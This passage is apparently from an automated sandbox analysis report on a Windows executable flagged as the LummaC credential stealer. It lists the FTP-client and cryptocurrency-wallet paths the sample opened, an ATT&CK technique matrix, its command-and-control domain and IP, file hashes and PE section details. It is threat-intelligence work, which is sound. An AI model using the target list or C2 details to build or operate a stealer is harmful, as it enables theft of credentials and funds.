            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
            Source: Yara matchFile source: 00000000.00000003.1420219520.000000000155F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		34
            Virtualization/Sandbox Evasion            		2
            OS Credential Dumping            		751
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory34
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol41
            Data from Local System            		2
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
            Obfuscated Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive113
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
            Software Packing            		NTDS1
            File and Directory Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets223
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            file.exe100%AviraTR/Crypt.TPM.Gen
            file.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://property-imper.sbs/apiD0%Avira URL Cloudsafe
            https://property-imper.sbs/apib0%Avira URL Cloudsafe
            https://property-imper.sbs/apif0%Avira URL Cloudsafe
            https://property-imper.sbs:443/apil0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            property-imper.sbs
            		172.67.162.84
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://property-imper.sbs/apifalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://property-imper.sbs/apibfile.exe, 00000000.00000003.1418734369.0000000005CF1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1418665847.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://property-imper.sbs/apiffile.exe, 00000000.00000003.1497765661.0000000001575000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1499176538.0000000001576000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441241710.0000000001573000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1458128435.0000000001573000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497573349.0000000001573000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://property-imper.sbs:443/apifile.exe, 00000000.00000002.1498844199.00000000014E2000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://property-imper.sbs:443/apilfile.exe, 00000000.00000002.1498844199.00000000014E2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.file.exe, 00000000.00000003.1397093240.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://property-imper.sbs/file.exe, 00000000.00000003.1441202945.0000000005CEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1418734369.0000000005CF1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497536096.0000000005CEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497593408.0000000001559000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1502091584.0000000005CF6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1499118729.0000000001559000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497785054.0000000001559000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1498844199.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497801753.0000000005CF5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441310758.0000000005CF1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1418665847.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1458069088.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1396696927.0000000006108000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://property-imper.sbs/apiDfile.exe, 00000000.00000003.1497765661.0000000001575000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1499176538.0000000001576000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1458128435.0000000001573000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497573349.0000000001573000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://x1.c.lencr.org/0file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://x1.i.lencr.org/0file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9efile.exe, 00000000.00000003.1397093240.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgfile.exe, 00000000.00000003.1397093240.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1396696927.0000000006108000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          172.67.162.84
                                                          		property-imper.sbsUnited States
                                                          		13335CLOUDFLARENETUSfalse

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1561861
                                                          Start date and time:2024-11-24 14:55:11 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 6m 4s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:7
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:file.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:Failed
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: file.exe

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          08:56:18API Interceptor8x Sleep call for process: file.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          172.67.162.84file.exeGet hashmaliciousLummaC StealerBrowse
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                            file.exeGet hashmaliciousLummaC StealerBrowse

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              property-imper.sbsfile.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                              • 172.67.162.84

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.161.207
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.21.10.6
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                              • 104.21.33.116
                                                                              lw2HMxuVuf.exeGet hashmaliciousUnknownBrowse
                                                                              • 172.66.0.227
                                                                              mDHwap5GlV.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.74.152
                                                                              2aiDfP0r7h.lnkGet hashmaliciousUnknownBrowse
                                                                              • 104.16.230.132
                                                                              OVtsE8ZkBE.lnkGet hashmaliciousUnknownBrowse
                                                                              • 104.16.231.132

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                              • 172.67.162.84
                                                                              lw2HMxuVuf.exeGet hashmaliciousUnknownBrowse
                                                                              • 172.67.162.84
                                                                              mDHwap5GlV.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              No created / dropped files found

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.951363705834021
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:file.exe
                                                                              File size:1'865'728 bytes
                                                                              MD5:5e1ee83df7fd0f85791575eed5abffa8
                                                                              SHA1:f08345571a764d0c1837951c26b75757f3328005
                                                                              SHA256:15b5aa1fbb4d831060a3276e5ea6119ddc6a5228371dd99bd40c98d9e4937ad2
                                                                              SHA512:0c109ecbc120f9ba8b9c8a50e9b27e5d1f3cb1af42025dd40c87a95a011550b15b900fee1473f3d719a858552ee5e97650ddc27daa8defbfa8147a0588ae61ed
                                                                              SSDEEP:24576:CSDl7QJZPHb1oBUH4qkL7r9TZQlIhm+AcktOYp9ND1c2QE3GNZs2vPPyc7WYKNKt:VFQJJbeBENelTccktNe7KMZPaca4
                                                                              TLSH:1D8533782691CF9FD28D8C7E2593C12773387DC6A6AF8EEA4D16B035C557072A16E0C8
                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g.............................0J...........@..........................`J.....v.....@.................................\...p..

                                                                              File Icon

                                                                              Icon Hash:00928e8e8686b000

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x8a3000
                                                                              Entrypoint Section:.taggant
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:6
                                                                              OS Version Minor:0
                                                                              File Version Major:6
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:6
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              jmp 00007FF9ACC6F96Ah
                                                                              orps xmm3, dqword ptr [eax+eax]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              jmp 00007FF9ACC71965h
                                                                              add byte ptr [edi], al
                                                                              or al, byte ptr [eax]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], dh
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [edx], ah
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], cl
                                                                              add byte ptr [eax], 00000000h
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              adc byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              push es
                                                                              or al, byte ptr [eax]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              0x10000x560000x262003b103a061aba53ed65f898a81e476e9bFalse0.999250768442623data7.97990031272369IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0x570000x2b00x200a4de664039b501e30242a78111d7c34eFalse0.798828125data6.002226034832892IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              0x590000x2ab0000x20053a1177555eb8bfd957f620219d06950unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              mbsuitke0x3040000x19e0000x19da00ff9226eade0f4da9593c352393e01f7aFalse0.9943489819431852data7.954841662083077IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              iyarxzjx0x4a20000x10000x400bb34997f5dab771e9bc02d78ece68706False0.78515625data6.087763009818877IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
